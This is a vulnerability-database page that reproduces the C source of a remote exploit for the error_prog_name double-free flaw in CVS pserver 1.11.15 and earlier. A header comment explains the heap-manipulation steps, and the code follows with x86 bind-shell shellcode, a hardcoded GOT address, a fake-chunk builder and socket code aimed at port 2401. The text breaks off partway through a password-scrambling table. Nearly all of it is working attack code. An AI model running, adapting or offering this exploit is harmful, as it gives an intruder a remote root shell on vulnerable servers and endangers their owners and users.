Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Remote CVS <= 1.11.15 (error_prog_name) Remote Exploit

🗓️ 05 Jun 2008 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 37 Views

Remote CVS <= 1.11.15 (error_prog_name) Remote Exploit by Gyan Chawdhar

Code

                                                *&nbsp;Remote&nbsp;CVS&nbsp;&lt;=&nbsp;1.11.15&nbsp;exploit&nbsp;for&nbsp;the&nbsp;error_prog_name&nbsp;double&nbsp;free&nbsp;vuln.&nbsp;
*&nbsp;
*&nbsp;by&nbsp;Gyan&nbsp;Chawdhary,&nbsp;[email protected]&nbsp;
*&nbsp;
*&nbsp;Vulnerability&nbsp;Description:&nbsp;
*&nbsp;
*&nbsp;The&nbsp;Vulnerability&nbsp;lies&nbsp;in&nbsp;the&nbsp;serve_argumentx&nbsp;function.&nbsp;The&nbsp;Argumentx&nbsp;
command&nbsp;
*&nbsp;parameter&nbsp;is&nbsp;used&nbsp;to&nbsp;append&nbsp;data&nbsp;to&nbsp;a&nbsp;previously&nbsp;supplied&nbsp;Argument&nbsp;
command.&nbsp;
*&nbsp;These&nbsp;data&nbsp;pointers&nbsp;are&nbsp;stored&nbsp;in&nbsp;the&nbsp;argument_vector&nbsp;array.&nbsp;The&nbsp;
*&nbsp;serve_argumentx&nbsp;fails&nbsp;to&nbsp;check&nbsp;wether&nbsp;an&nbsp;Argument&nbsp;command&nbsp;is&nbsp;present&nbsp;in&nbsp;
the&nbsp;
*&nbsp;argument_vector&nbsp;and&nbsp;may&nbsp;append&nbsp;data&nbsp;to&nbsp;a&nbsp;pointer&nbsp;that&nbsp;should&nbsp;not&nbsp;get&nbsp;
*&nbsp;touched&nbsp;at&nbsp;all,&nbsp;in&nbsp;our&nbsp;case&nbsp;the&nbsp;*error_prog_name&nbsp;string.&nbsp;The&nbsp;function&nbsp;
calls&nbsp;
*&nbsp;realloc&nbsp;to&nbsp;create&nbsp;space&nbsp;for&nbsp;the&nbsp;new&nbsp;string.&nbsp;Because&nbsp;realloc&nbsp;will&nbsp;be&nbsp;called&nbsp;
*&nbsp;to&nbsp;store&nbsp;strlen(error_prog_name)&nbsp;+&nbsp;strlen(somedata)&nbsp;the&nbsp;original&nbsp;chunk&nbsp;
which&nbsp;
*&nbsp;just&nbsp;stores&nbsp;error_prog_name&nbsp;will&nbsp;get&nbsp;freed.&nbsp;This&nbsp;free&nbsp;chunk&nbsp;will&nbsp;once&nbsp;
again&nbsp;
*&nbsp;get&nbsp;freed&nbsp;after&nbsp;we&nbsp;disconnect&nbsp;from&nbsp;the&nbsp;CVS&nbsp;pserver.&nbsp;
*&nbsp;
*&nbsp;Theory:&nbsp;
*&nbsp;
*&nbsp;Sucessful&nbsp;exploitation&nbsp;depends&nbsp;heavily&nbsp;on&nbsp;a&nbsp;specific&nbsp;heap&nbsp;layout&nbsp;to&nbsp;be&nbsp;
met.&nbsp;
*&nbsp;The&nbsp;argument_vector&nbsp;is&nbsp;initialized&nbsp;for&nbsp;holding&nbsp;3&nbsp;ptrs.&nbsp;If&nbsp;more&nbsp;space&nbsp;is&nbsp;
*&nbsp;required&nbsp;it&nbsp;will&nbsp;call&nbsp;realloc.&nbsp;The&nbsp;error_prog_name&nbsp;string&nbsp;resides&nbsp;right&nbsp;
*&nbsp;after&nbsp;the&nbsp;argument_vector&nbsp;chunk.&nbsp;
*&nbsp;
*&nbsp;|11|&nbsp;arg_vector&nbsp;|11|&nbsp;error_prog_name&nbsp;|109|&nbsp;some&nbsp;chunk&nbsp;
*&nbsp;
*&nbsp;address&nbsp;of&nbsp;error_prog_name&nbsp;is&nbsp;stored&nbsp;in&nbsp;the&nbsp;argument_vector[0].&nbsp;
*&nbsp;
*&nbsp;To&nbsp;achive&nbsp;sucessfull&nbsp;exploitation&nbsp;the&nbsp;following&nbsp;steps&nbsp;are&nbsp;performed.&nbsp;
*&nbsp;
*&nbsp;1)&nbsp;Send&nbsp;Argumentx&nbsp;command&nbsp;with&nbsp;a&nbsp;large&nbsp;argument&nbsp;to&nbsp;reallocate&nbsp;
error_prog_name&nbsp;
*&nbsp;+&nbsp;large&nbsp;command&nbsp;on&nbsp;top&nbsp;of&nbsp;the&nbsp;heap.&nbsp;This&nbsp;will&nbsp;free&nbsp;the&nbsp;original&nbsp;
*&nbsp;error_prog_name&nbsp;buffer.&nbsp;
*&nbsp;
*&nbsp;2)&nbsp;Send&nbsp;50&nbsp;Argument&nbsp;calls&nbsp;which&nbsp;will&nbsp;require&nbsp;the&nbsp;argument_vector&nbsp;array&nbsp;to&nbsp;
be&nbsp;
*&nbsp;reallocated&nbsp;freeing&nbsp;the&nbsp;current&nbsp;buffer.&nbsp;We&nbsp;keep&nbsp;this&nbsp;a&nbsp;high&nbsp;number&nbsp;to&nbsp;get&nbsp;
*&nbsp;mem&nbsp;from&nbsp;the&nbsp;top&nbsp;itself&nbsp;and&nbsp;to&nbsp;make&nbsp;the&nbsp;exploit&nbsp;reliable.&nbsp;As&nbsp;both&nbsp;the&nbsp;
*&nbsp;original&nbsp;the&nbsp;arg_vector&nbsp;&amp;&nbsp;err_prg_name&nbsp;buffers&nbsp;are&nbsp;free&nbsp;they&nbsp;are&nbsp;
*&nbsp;consolidated.&nbsp;Also&nbsp;we&nbsp;supply&nbsp;our&nbsp;fake&nbsp;chunk&nbsp;and&nbsp;shellcode&nbsp;in&nbsp;this&nbsp;call.&nbsp;
*&nbsp;
*&nbsp;3)&nbsp;Send&nbsp;an&nbsp;argument&nbsp;command&nbsp;with&nbsp;the&nbsp;size&nbsp;&amp;&nbsp;prevsize&nbsp;as&nbsp;its&nbsp;arguments.&nbsp;
This&nbsp;
*&nbsp;will&nbsp;now&nbsp;be&nbsp;stored&nbsp;in&nbsp;arg_vector&nbsp;&amp;&nbsp;err_prg_name&nbsp;consolidated&nbsp;buffer.&nbsp;
*&nbsp;
*&nbsp;4)&nbsp;Once&nbsp;we&nbsp;close&nbsp;the&nbsp;connection&nbsp;free&nbsp;will&nbsp;be&nbsp;called&nbsp;on&nbsp;the&nbsp;error_prog_name&nbsp;
*&nbsp;string&nbsp;which&nbsp;will&nbsp;read&nbsp;our&nbsp;fake&nbsp;size&nbsp;&amp;&nbsp;prev_size&nbsp;fields&nbsp;pointing&nbsp;to&nbsp;the&nbsp;
fake&nbsp;
*&nbsp;chunk&nbsp;,&nbsp;executing&nbsp;our&nbsp;shellcode.&nbsp;
*&nbsp;
*&nbsp;Phew&nbsp;!!!!&nbsp;
*&nbsp;
*&nbsp;NOTES:&nbsp;Iv&nbsp;tried&nbsp;this&nbsp;exp&nbsp;on&nbsp;RH&nbsp;8&nbsp;with&nbsp;glibc&nbsp;2.3.*.&nbsp;This&nbsp;exp&nbsp;did&nbsp;NOT&nbsp;work&nbsp;
on&nbsp;
*&nbsp;my&nbsp;slack&nbsp;8.0&nbsp;cause&nbsp;of&nbsp;glibc&nbsp;2.2&nbsp;which&nbsp;creates&nbsp;a&nbsp;very&nbsp;different&nbsp;heap&nbsp;
layout.&nbsp;
*&nbsp;Also&nbsp;some&nbsp;tweaking&nbsp;will&nbsp;be&nbsp;required&nbsp;to&nbsp;use&nbsp;this&nbsp;exploit&nbsp;remotely&nbsp;as&nbsp;
sometimes&nbsp;
*&nbsp;the&nbsp;overwritten&nbsp;GOT&nbsp;does&nbsp;not&nbsp;execute&nbsp;due&nbsp;to&nbsp;early&nbsp;drop&nbsp;in&nbsp;the&nbsp;connection&nbsp;
..&nbsp;
*&nbsp;Please&nbsp;someone&nbsp;figure&nbsp;it&nbsp;out&nbsp;n&nbsp;mail&nbsp;me&nbsp;:)&nbsp;..&nbsp;
*&nbsp;
*&nbsp;Now&nbsp;the&nbsp;exploit&nbsp;
*&nbsp;
*&nbsp;FOR&nbsp;EDUCATIONAL&nbsp;PURPOSE&nbsp;ONLY&nbsp;FOR&nbsp;EDUCATIONAL&nbsp;PURPOSE&nbsp;ONLY&nbsp;FOR&nbsp;EDUCATIONAL&nbsp;
*&nbsp;PURPOSE&nbsp;ONLY&nbsp;FOR&nbsp;EDUCATIONAL&nbsp;PURPOSE&nbsp;ONLY&nbsp;FOR&nbsp;EDUCATIONAL&nbsp;PURPOSE&nbsp;ONLY&nbsp;FOR&nbsp;
*&nbsp;EDUCATIONAL&nbsp;PURPOSE&nbsp;ONLY&nbsp;FOR&nbsp;EDUCATIONAL&nbsp;PURPOSE&nbsp;ONLY&nbsp;FOR&nbsp;EDUCATIONAL&nbsp;
PURPOSE&nbsp;*&nbsp;
*&nbsp;Greets:&nbsp;jp&nbsp;-&nbsp;for&nbsp;his&nbsp;cool&nbsp;paper&nbsp;on&nbsp;advanced&nbsp;malloc&nbsp;exploits,&nbsp;and&nbsp;the&nbsp;
heapy.so&nbsp;
*&nbsp;jaguar@felinemenace&nbsp;-&nbsp;We&nbsp;at&nbsp;...&nbsp;:P&nbsp;
*&nbsp;
*&nbsp;cya&nbsp;
*&nbsp;
*&nbsp;Gyan&nbsp;
*/&nbsp;

#include&nbsp;&lt;stdio.h&gt;&nbsp;
#include&nbsp;&lt;stdlib.h&gt;&nbsp;
#include&nbsp;&lt;unistd.h&gt;&nbsp;
#include&nbsp;&lt;string.h&gt;&nbsp;

#include&nbsp;&lt;sys/socket.h&gt;&nbsp;
#include&nbsp;&lt;sys/types.h&gt;&nbsp;
#include&nbsp;&lt;netinet/in.h&gt;&nbsp;

char&nbsp;shellcode[]&nbsp;=&nbsp;
&quot;xebx18&quot;&nbsp;
&quot;AAAAAAAAAAAAAAAAAAAAAAAA&quot;&nbsp;
&quot;x31xc0&quot;&nbsp;//&nbsp;xorl&nbsp;%eax,%eax&nbsp;
&quot;x31xdb&quot;&nbsp;//&nbsp;xorl&nbsp;%ebx,%ebx&nbsp;
&quot;x31xc9&quot;&nbsp;//&nbsp;xorl&nbsp;%ecx,%ecx&nbsp;
&quot;x31xd2&quot;&nbsp;//&nbsp;xorl&nbsp;%edx,%edx&nbsp;
&quot;xb0x66&quot;&nbsp;//&nbsp;movb&nbsp;$0x66,%al&nbsp;
&quot;xb3x01&quot;&nbsp;//&nbsp;movb&nbsp;$0x1,%bl&nbsp;
&quot;x51&quot;&nbsp;//&nbsp;pushl&nbsp;%ecx&nbsp;
&quot;xb1x06&quot;&nbsp;//&nbsp;movb&nbsp;$0x6,%cl&nbsp;
&quot;x51&quot;&nbsp;//&nbsp;pushl&nbsp;%ecx&nbsp;
&quot;xb1x01&quot;&nbsp;//&nbsp;movb&nbsp;$0x1,%cl&nbsp;
&quot;x51&quot;&nbsp;//&nbsp;pushl&nbsp;%ecx&nbsp;
&quot;xb1x02&quot;&nbsp;//&nbsp;movb&nbsp;$0x2,%cl&nbsp;
&quot;x51&quot;&nbsp;//&nbsp;pushl&nbsp;%ecx&nbsp;
&quot;x8dx0cx24&quot;&nbsp;//&nbsp;leal&nbsp;(%esp),%ecx&nbsp;
&quot;xcdx80&quot;&nbsp;//&nbsp;int&nbsp;$0x80&nbsp;

/*&nbsp;port&nbsp;is&nbsp;30464&nbsp;!!!&nbsp;*/&nbsp;
/*&nbsp;bind(fd,&nbsp;(struct&nbsp;sockaddr)&amp;sin,&nbsp;sizeof(sin)&nbsp;)&nbsp;*/&nbsp;
&quot;xb3x02&quot;&nbsp;//&nbsp;movb&nbsp;$0x2,%bl&nbsp;
&quot;xb1x02&quot;&nbsp;//&nbsp;movb&nbsp;$0x2,%cl&nbsp;
&quot;x31xc9&quot;&nbsp;//&nbsp;xorl&nbsp;%ecx,%ecx&nbsp;
&quot;x51&quot;&nbsp;//&nbsp;pushl&nbsp;%ecx&nbsp;
&quot;x51&quot;&nbsp;//&nbsp;pushl&nbsp;%ecx&nbsp;
&quot;x51&quot;&nbsp;//&nbsp;pushl&nbsp;%ecx&nbsp;
/*&nbsp;port&nbsp;=&nbsp;0x77,&nbsp;change&nbsp;if&nbsp;needed&nbsp;*/&nbsp;
&quot;x80xc1x77&quot;&nbsp;//&nbsp;addb&nbsp;$0x77,%cl&nbsp;
&quot;x66x51&quot;&nbsp;//&nbsp;pushl&nbsp;%cx&nbsp;
&quot;xb1x02&quot;&nbsp;//&nbsp;movb&nbsp;$0x2,%cl&nbsp;
&quot;x66x51&quot;&nbsp;//&nbsp;pushw&nbsp;%cx&nbsp;
&quot;x8dx0cx24&quot;&nbsp;//&nbsp;leal&nbsp;(%esp),%ecx&nbsp;
&quot;xb2x10&quot;&nbsp;//&nbsp;movb&nbsp;$0x10,%dl&nbsp;
&quot;x52&quot;&nbsp;//&nbsp;pushl&nbsp;%edx&nbsp;
&quot;x51&quot;&nbsp;//&nbsp;pushl&nbsp;%ecx&nbsp;
&quot;x50&quot;&nbsp;//&nbsp;pushl&nbsp;%eax&nbsp;
&quot;x8dx0cx24&quot;&nbsp;//&nbsp;leal&nbsp;(%esp),%ecx&nbsp;
&quot;x89xc2&quot;&nbsp;//&nbsp;movl&nbsp;%eax,%edx&nbsp;
&quot;x31xc0&quot;&nbsp;//&nbsp;xorl&nbsp;%eax,%eax&nbsp;
&quot;xb0x66&quot;&nbsp;//&nbsp;movb&nbsp;$0x66,%al&nbsp;
&quot;xcdx80&quot;&nbsp;//&nbsp;int&nbsp;$0x80&nbsp;

/*&nbsp;listen(fd,&nbsp;1)&nbsp;*/&nbsp;
&quot;xb3x01&quot;&nbsp;//&nbsp;movb&nbsp;$0x1,%bl&nbsp;
&quot;x53&quot;&nbsp;//&nbsp;pushl&nbsp;%ebx&nbsp;
&quot;x52&quot;&nbsp;//&nbsp;pushl&nbsp;%edx&nbsp;
&quot;x8dx0cx24&quot;&nbsp;//&nbsp;leal&nbsp;(%esp),%ecx&nbsp;
&quot;x31xc0&quot;&nbsp;//&nbsp;xorl&nbsp;%eax,%eax&nbsp;
&quot;xb0x66&quot;&nbsp;//&nbsp;movb&nbsp;$0x66,%al&nbsp;
&quot;x80xc3x03&quot;&nbsp;//&nbsp;addb&nbsp;$0x3,%bl&nbsp;
&quot;xcdx80&quot;&nbsp;//&nbsp;int&nbsp;$0x80&nbsp;

/*&nbsp;cli&nbsp;=&nbsp;accept(fd,&nbsp;0,&nbsp;0)&nbsp;*/&nbsp;
&quot;x31xc0&quot;&nbsp;//&nbsp;xorl&nbsp;%eax,%eax&nbsp;
&quot;x50&quot;&nbsp;//&nbsp;pushl&nbsp;%eax&nbsp;
&quot;x50&quot;&nbsp;//&nbsp;pushl&nbsp;%eax&nbsp;
&quot;x52&quot;&nbsp;//&nbsp;pushl&nbsp;%edx&nbsp;
&quot;x8dx0cx24&quot;&nbsp;//&nbsp;leal&nbsp;(%esp),%ecx&nbsp;
&quot;xb3x05&quot;&nbsp;//&nbsp;movl&nbsp;$0x5,%bl&nbsp;
&quot;xb0x66&quot;&nbsp;//&nbsp;movl&nbsp;$0x66,%al&nbsp;
&quot;xcdx80&quot;&nbsp;//&nbsp;int&nbsp;$0x80&nbsp;

/*&nbsp;dup2(cli,&nbsp;0)&nbsp;*/&nbsp;
&quot;x89xc3&quot;&nbsp;//&nbsp;movl&nbsp;%eax,%ebx&nbsp;
&quot;x31xc9&quot;&nbsp;//&nbsp;xorl&nbsp;%ecx,%ecx&nbsp;
&quot;x31xc0&quot;&nbsp;//&nbsp;xorl&nbsp;%eax,%eax&nbsp;
&quot;xb0x3f&quot;&nbsp;//&nbsp;movb&nbsp;$0x3f,%al&nbsp;
&quot;xcdx80&quot;&nbsp;//&nbsp;int&nbsp;$0x80&nbsp;

/*&nbsp;dup2(cli,&nbsp;1)&nbsp;*/&nbsp;
&quot;x41&quot;&nbsp;//&nbsp;inc&nbsp;%ecx&nbsp;
&quot;x31xc0&quot;&nbsp;//&nbsp;xorl&nbsp;%eax,%eax&nbsp;
&quot;xb0x3f&quot;&nbsp;//&nbsp;movl&nbsp;$0x3f,%al&nbsp;
&quot;xcdx80&quot;&nbsp;//&nbsp;int&nbsp;$0x80&nbsp;

/*&nbsp;dup2(cli,&nbsp;2)&nbsp;*/&nbsp;
&quot;x41&quot;&nbsp;//&nbsp;inc&nbsp;%ecx&nbsp;
&quot;x31xc0&quot;&nbsp;//&nbsp;xorl&nbsp;%eax,%eax&nbsp;
&quot;xb0x3f&quot;&nbsp;//&nbsp;movb&nbsp;$0x3f,%al&nbsp;
&quot;xcdx80&quot;&nbsp;//&nbsp;int&nbsp;$0x80&nbsp;

/*&nbsp;execve(&quot;//bin/sh&quot;,&nbsp;[&quot;//bin/sh&quot;,&nbsp;NULL],&nbsp;NULL);&nbsp;*/&nbsp;
&quot;x31xdb&quot;&nbsp;//&nbsp;xorl&nbsp;%ebx,%ebx&nbsp;
&quot;x53&quot;&nbsp;//&nbsp;pushl&nbsp;%ebx&nbsp;
&quot;x68x6ex2fx73x68&quot;&nbsp;//&nbsp;pushl&nbsp;$0x68732f6e&nbsp;
&quot;x68x2fx2fx62x69&quot;&nbsp;//&nbsp;pushl&nbsp;$0x69622f2f&nbsp;
&quot;x89xe3&quot;&nbsp;//&nbsp;movl&nbsp;%esp,%ebx&nbsp;
&quot;x8dx54x24x08&quot;&nbsp;//&nbsp;leal&nbsp;0x8(%esp),%edx&nbsp;
&quot;x31xc9&quot;&nbsp;//&nbsp;xorl&nbsp;%ecx,%ecx&nbsp;
&quot;x51&quot;&nbsp;//&nbsp;pushl&nbsp;%ecx&nbsp;
&quot;x53&quot;&nbsp;//&nbsp;pushl&nbsp;%ebx&nbsp;
&quot;x8dx0cx24&quot;&nbsp;//&nbsp;leal&nbsp;(%esp),%ecx&nbsp;
&quot;x31xc0&quot;&nbsp;//&nbsp;xorl&nbsp;%eax,%eax&nbsp;
&quot;xb0x0b&quot;&nbsp;//&nbsp;movb&nbsp;$0xb,%al&nbsp;
&quot;xcdx80&quot;&nbsp;//&nbsp;int&nbsp;$0x80&nbsp;

/*&nbsp;exit(%ebx)&nbsp;*/&nbsp;
&quot;x31xc0&quot;&nbsp;//&nbsp;xorl&nbsp;%eax,%eax&nbsp;
&quot;xb0x01&quot;&nbsp;//&nbsp;movb&nbsp;$0x1,%al&nbsp;
&quot;xcdx80&quot;;&nbsp;//&nbsp;int&nbsp;$0x80&nbsp;

void&nbsp;login(char&nbsp;*,&nbsp;char&nbsp;*,&nbsp;char&nbsp;*);&nbsp;

struct&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;sockaddr_in&nbsp;s;&nbsp;
int&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;sock;&nbsp;

void&nbsp;xp_connect(char&nbsp;*ip)&nbsp;
{&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;char&nbsp;buffer[1024];&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;char&nbsp;temp[1024];&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;int&nbsp;tmp;&nbsp;

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;s.sin_family&nbsp;=&nbsp;AF_INET;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;s.sin_port&nbsp;=&nbsp;htons(2401);&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;s.sin_addr.s_addr&nbsp;=&nbsp;inet_addr(ip);&nbsp;

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;((sock&nbsp;=&nbsp;socket(AF_INET,&nbsp;SOCK_STREAM,&nbsp;0))&nbsp;&lt;&nbsp;0)&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;printf(&quot;Cannot&nbsp;create&nbsp;socketn&quot;);&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;exit(-1);&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}&nbsp;

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if((connect(sock,(struct&nbsp;sockaddr&nbsp;*)&amp;s,sizeof(struct&nbsp;sockaddr)))&nbsp;&lt;&nbsp;
0)&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;printf(&quot;Cannot&nbsp;connect()n&quot;);&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;exit(-1);&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}&nbsp;
}&nbsp;

void&nbsp;xp_write(char&nbsp;*data)&nbsp;
{&nbsp;

if(write&nbsp;(sock,&nbsp;data,&nbsp;strlen(data))&nbsp;&lt;&nbsp;0)&nbsp;
{&nbsp;
printf(&quot;write()&nbsp;failedn&quot;);&nbsp;
exit(-1);&nbsp;
}&nbsp;
}&nbsp;

void&nbsp;xp_receive()&nbsp;
{&nbsp;
int&nbsp;tmp;&nbsp;
char&nbsp;buffer[1024*2];&nbsp;

if&nbsp;(&nbsp;(tmp&nbsp;=&nbsp;read(sock,&nbsp;buffer,&nbsp;sizeof(buffer)))&nbsp;&lt;=&nbsp;0)&nbsp;
{&nbsp;
printf(&quot;read()&nbsp;failedn&quot;);&nbsp;
exit(-1);&nbsp;
}&nbsp;
printf(&quot;%s&quot;,&nbsp;buffer);&nbsp;
}&nbsp;




#define&nbsp;GOT_MEMCPY&nbsp;0x80d2b4a&nbsp;
#define&nbsp;SHELL_ADDR&nbsp;0x080cda20&nbsp;

char&nbsp;*egg(unsigned&nbsp;int&nbsp;what,&nbsp;unsigned&nbsp;int&nbsp;where)&nbsp;
{&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;char&nbsp;*ptr,&nbsp;*buf;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;int&nbsp;i=0;&nbsp;//dummy&nbsp;=&nbsp;0xfffffffc;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;int&nbsp;size&nbsp;=&nbsp;strlen(shellcode);&nbsp;

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//&nbsp;Will&nbsp;contain&nbsp;our&nbsp;fake&nbsp;chunk&nbsp;supplided&nbsp;with&nbsp;our&nbsp;fd&nbsp;&amp;&nbsp;bk&nbsp;fields,&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//&nbsp;addr&nbsp;of&nbsp;shellcode&nbsp;&amp;&nbsp;got&nbsp;addr&nbsp;-&nbsp;8&nbsp;of&nbsp;free().&nbsp;We&nbsp;will&nbsp;also&nbsp;try&nbsp;to&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//&nbsp;stuff&nbsp;in&nbsp;our&nbsp;shellcode&nbsp;in&nbsp;the&nbsp;same&nbsp;buffer&nbsp;as&nbsp;I&nbsp;dont&nbsp;have&nbsp;enough&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//&nbsp;gdb&nbsp;patience/time&nbsp;&nbsp;&nbsp;to&nbsp;find&nbsp;nother&nbsp;controlable&nbsp;buffer&nbsp;:P&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;buf&nbsp;=&nbsp;(char&nbsp;*)malloc(1250);&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ptr&nbsp;=&nbsp;buf;&nbsp;

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;for&nbsp;(;i&lt;1248;)&nbsp;{&nbsp;

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;*(&nbsp;(int&nbsp;**)ptr&nbsp;)&nbsp;=&nbsp;(int&nbsp;*)(&nbsp;where&nbsp;-&nbsp;8&nbsp;);&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ptr+=4;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;*(&nbsp;(int&nbsp;**)ptr&nbsp;)&nbsp;=&nbsp;(int&nbsp;*)(&nbsp;what&nbsp;);&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ptr+=4;&nbsp;

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;i+=8;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;buf[1250]&nbsp;=&nbsp;'';&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ptr&nbsp;-=&nbsp;size;&nbsp;
strcpy(ptr,&nbsp;shellcode);&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ptr&nbsp;=&nbsp;buf;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;ptr;&nbsp;

}&nbsp;

unsigned&nbsp;char&nbsp;shifts[]&nbsp;=&nbsp;{&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0,&nbsp;&nbsp;&nbsp;1,&nbsp;&nbsp;&nbsp;2,&nbsp;&nbsp;&nbsp;3,&nbsp;&nbsp;&nbsp;4,&nbsp;&nbsp;&nbsp;5,&nbsp;&nbsp;&nbsp;6,&nbsp;&nbsp;&nbsp;7,&nbsp;&nbsp;&nbsp;8,&nbsp;&nbsp;&nbsp;9,&nbsp;10,&nbsp;11,&nbsp;12,&nbsp;13,&nbsp;14,&nbsp;15,&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;16,&nbsp;17,&nbsp;18,&nbsp;19,&nbsp;20,&nbsp;21,&nbsp;22,&nbsp;23,&nbsp;24,&nbsp;25,&nbsp;26,&nbsp;27,&nbsp;28,&nbsp;29,&nbsp;30,&nbsp;31,&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;114,120,&nbsp;53,&nbsp;79,&nbsp;96,109,&nbsp;72,108,&nbsp;70,&nbsp;64,&nbsp;76,&nbsp;67,116,&nbsp;74,&nbsp;68,&nbsp;87,&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;111,&nbsp;52,&nbsp;75,119,&nbsp;49,&nbsp;34,&nbsp;82,&nbsp;81,&nbsp;95,&nbsp;65,112,&nbsp;86,118,110,122,105,&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;41,&nbsp;57,&nbsp;83,&nbsp;43,&nbsp;46,102,&nbsp;40,&nbsp;89,&nbsp;38,103,&nbsp;45,&nbsp;50,&nbsp;42,123,&nbsp;91,&nbsp;35,&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;125,&nbsp;55,&nbsp;54,&nbsp;66,124,126,&nbsp;59,&nbsp;47,&nbsp;92,&nbsp;71,115,&nbsp;78,&nbsp;88,107,106,&nbsp;56,&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;36,121,117,104,101,100,&nbsp;69,&nbsp;73,&nbsp;99,&nbsp;63,&nbsp;94,&nbsp;93,&nbsp;39,&nbsp;37,&nbsp;61,&nbsp;48,&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;58,113,&nbsp;32,&nbsp;90,&nbsp;44,&nbsp;98,&nbsp;60,&nbsp;51,&nbsp;33,&nbsp;97,&nbsp;62,&nbsp;77,&nbsp;84,&nbsp;80,&nbsp;85,223,&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;225,216,187,166,229,189,222,188,141,249,148,200,184,136,248,190,&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;199,170,181,204,138,232,218,183,255,234,220,247,213,203,226,193,&nbsp;
